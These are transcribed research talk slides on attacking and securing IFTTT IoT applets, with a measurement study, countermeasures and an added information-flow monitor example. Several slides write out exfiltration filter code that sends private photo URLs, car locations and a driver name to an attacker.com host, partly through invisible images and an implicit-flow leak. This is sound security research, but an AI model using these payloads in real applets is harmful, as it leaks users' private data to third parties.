Breaking and Fixing IoT Apps
Andrei Sabelfeld
Joint work with Iulia Bastys and Musard Balliu
Appeared in CCS'18

Web of Things
Internet of Things (IoT)
• Incompatible standards, platforms, technologies
"World Wide Web Consortium (W3C) is in a unique position to create the royalty-free and platform-independent standards needed to overcome the fragmentation of the IoT" - W3C CEO Dr. Jeff Jaffe, 2017
Security implications?
IoT apps “Connecting otherwise unconnected services”
IoT apps
• "Managing users' digital lives"
  • Smart homes, smartphones, cars, fitness armbands
  • Online services (Google, Dropbox, ...)
  • Social networks (Facebook, Twitter, ...)
• End-user programming
  • Anyone can create and publish apps
  • Most apps by third parties
• Web interface + smartphone clients

IFTTT: "If This Then That"
• Trigger-action programming
• Largest IoT app platform
• Over 500 integrated services
• Millions of users and billions of running apps
IFTTT app: If this (Trigger) then that (Action). What can go wrong?

Attack by malicious app maker (diagram: If ... then ...)
IFTTT's access control
• If this (Trigger) then that (Action)
• Filter code: "sandboxed" JavaScript
• Users explicitly grant the app access

URLs as universal glue: "Connecting otherwise unconnected services"
If this (Trigger) then that (Action):
1. Upload new image file to IFTTT
2. Put up image under public URL on ifttt.com
3. Pass URL to Google Drive API for upload to Google

How to exfiltrate secrets?
• Private information available via APIs
  • Private sources: location, voice commands, images, ...
• Cannot directly exfiltrate from filter code
  • Public sinks?
  • Batch job programs with no I/O
  • "Can load the gun but not pull the trigger ..."

URL attacks
• "Load the gun and let somebody else pull the trigger"
• URL upload attack
  • PhotoURL
  • 'https://attacker.com?' + encodeURIComponent(PhotoURL)
• URL markup attack
  • Include an invisible image
  • '<img src=\"https://attacker.com?' + secret + '\" style=\"width:0px;height:0px;\">'
URL upload attack demo
URL markup attack demo
3rd-party applet attack surface
• If (trigger side): privacy
• then (action side): integrity & availability

Empirical measurement study
• Dataset by Mi et al. (May 2017)
  • 279,828 IFTTT applets: triggers and actions used
• Classification of triggers and actions
  • Privacy, integrity & availability
  • Per category
• Classification of applets
  • Private source & public sink: potential privacy violation
  • High-integrity sink: potential integrity violation
  • Possibility of skipping the trigger: potential denial of service
• 30% of apps potentially vulnerable

(Chart: IFTTT triggers. Number of triggers per category, 0-200, each category split into Private / Available / Public; categories range from appliances and blogging to voice assistants.)

(Chart: IFTTT actions. Cumulative number of actions per category, 0-180, each category split into Public / Untrusted / Available.)

(Chart: Potential privacy violations. Counts per trigger category against action category, scale 0-1000.)
URL shortening attack demo
Countermeasures: break the flow
• Per-app access control
  • Public app: no private sources
  • Private app: no public sinks
  • Cannot build URLs from strings, only via APIs
• Output sanitization
• Authenticated communication
  • Protect resources on CDNs by requiring authentication
• If public URLs can't be avoided
  • Shorten URL lifetime; already done by some CDNs
  • Secure URL shortening: 11-12 chars best practice

Public app (diagram: If ... then ...)

Private app (diagram: If ... then ...)

Countermeasures: track the flow
• Track information flow in JavaScript code
• Allow flow from public sources to attacker
  • Logo image with public URL
• Block flow from private sources to attacker
  • Location leaks prevented
• JSFlow
  • Information flow tracker for JavaScript
  • ECMA-262 v.5 support
  • jsflow.net
Types of flow: explicit
APPLET TITLE: Automatically back up your new iOS photos to Google Drive
TRIGGER: Any new photo
FILTER & TRANSFORM:
  // The private photo URL flows directly (explicitly) into the attacker-controlled URL
  var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL);
  var attack = 'www.attacker.com?' + publicPhotoURL;
  GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack);
ACTION: Upload file from URL
Types of flow: explicit
APPLET TITLE: Automatically get an email every time you park your BMW with a map
TRIGGER: Car is parked
FILTER & TRANSFORM:
  var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl);
  // Legitimate map image shown to the user
  var locImg = '<img src=\"' + Location.enterOrExitRegionLocation.LocationMapUrl + '\">';
  // Invisible image whose URL carries the private location (explicit flow)
  var attack = '<img src=\"www.attacker.com?' + loc + '\" style=\"width:0px;height:0px;\">';
  // Public logo URL: a flow from a public source, harmless
  var iftttLogo = '<img src=\"www.ifttt.com/logo.png\" style=\"width:100px;height:100px;\">';
  Email.sendMeEmail.setBody('I ' + Location.enterOrExitRegionLocation.EnteredOrExited + ' an area ' + locImg + iftttLogo + attack);
ACTION: Send me an email
Types of flow: implicit
APPLET TITLE: Log your completed rides in Google Calendar
TRIGGER: Ride completed
FILTER & TRANSFORM:
  var rideMap = Uber.rideCompleted.TripMapImage;
  var driver = Uber.rideCompleted.DriverName;
  var dst = []; // copy of the driver name, rebuilt character by character
  for (var i = 0; i < driver.length; i++)
    for (var j = 32; j < 127; j++) {
      // The private value is only compared, never copied directly:
      // the leak happens through the control dependence on t
      var t = driver[i] == String.fromCharCode(j);
      if (t) { dst[i] = String.fromCharCode(j); }
    }
  var attack = '<img src=\"www.attacker.com?' + dst.join('') + '\" style=\"width:0px;height:0px;\">';
  GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack);
ACTION: Quick add event
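To make the explicit/implicit distinction above and the "track the flow" countermeasure concrete, here is an added example (mine, not JSFlow or IFTTT code): a toy labelled-value monitor with a program-counter label that blocks both the direct concatenation and the branch-based copy at a public sink while letting the public logo URL through. The ingredient values and the attacker.example host are constructed.

```javascript
// Minimal dynamic information-flow monitor for IFTTT-style filter code (added
// illustration, not JSFlow). Labels: 'L' public < 'H' private; values are {v, l}.
const join = (a, b) => (a === 'H' || b === 'H') ? 'H' : 'L';
const lbl = (v, l) => ({ v, l });

class Monitor {
  constructor() { this.pc = 'L'; }          // program-counter (context) label
  // Concatenation and comparison: result label is the join of both operands.
  concat(a, b) { return lbl(String(a.v) + String(b.v), join(a.l, b.l)); }
  eq(a, b) { return lbl(a.v === b.v, join(a.l, b.l)); }
  // Branching on a labelled boolean raises pc for the branch body, so that
  // anything assigned inside is tainted by the condition (implicit flow).
  branch(cond, thenFn) {
    const saved = this.pc;
    this.pc = join(this.pc, cond.l);
    if (cond.v) thenFn();
    this.pc = saved;
  }
  assign(val) { return lbl(val.v, join(val.l, this.pc)); }
  // Sink check: a public sink (URL upload, email body, ...) only takes public data.
  sink(sinkLabel, val) {
    if (sinkLabel === 'L' && val.l === 'H') return { blocked: true };
    return { blocked: false, sent: val.v };
  }
}

// Constructed trigger ingredients standing in for the real IFTTT ones.
const PHOTO_URL = lbl('https://locker.example/p/123.jpg', 'H'); // private source
const DRIVER = lbl('Bo', 'H');                                  // private source
const LOGO = lbl('https://ifttt.com/logo.png', 'L');            // public source

// Explicit flow (photo backup applet): private URL concatenated into attacker URL.
function explicitAttack(m) {
  const attack = m.concat(lbl('https://attacker.example/?', 'L'), PHOTO_URL);
  return m.sink('L', attack); // setUrl on the upload action is a public sink
}
// Implicit flow (ride log applet): rebuild the driver name by branching on
// comparisons; no private value is ever concatenated directly.
function implicitAttack(m) {
  const dst = [];
  for (let i = 0; i < DRIVER.v.length; i++)
    for (let j = 32; j < 127; j++)
      m.branch(m.eq(lbl(DRIVER.v[i], DRIVER.l), lbl(String.fromCharCode(j), 'L')),
               () => { dst[i] = m.assign(lbl(String.fromCharCode(j), 'L')); });
  return m.sink('L', dst.reduce((acc, c) => m.concat(acc, c), lbl('', 'L')));
}
// Benign flow: the public logo URL may reach a public sink.
function benignLogo(m) { return m.sink('L', LOGO); }

console.log(explicitAttack(new Monitor()), implicitAttack(new Monitor()), benignLogo(new Monitor()));
```

A production monitor such as JSFlow also has to handle object fields, exceptions and the no-sensitive-upgrade rule for public variables written under a high pc; this toy only propagates labels through concatenation, comparison and branches.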
Recommend
More recommend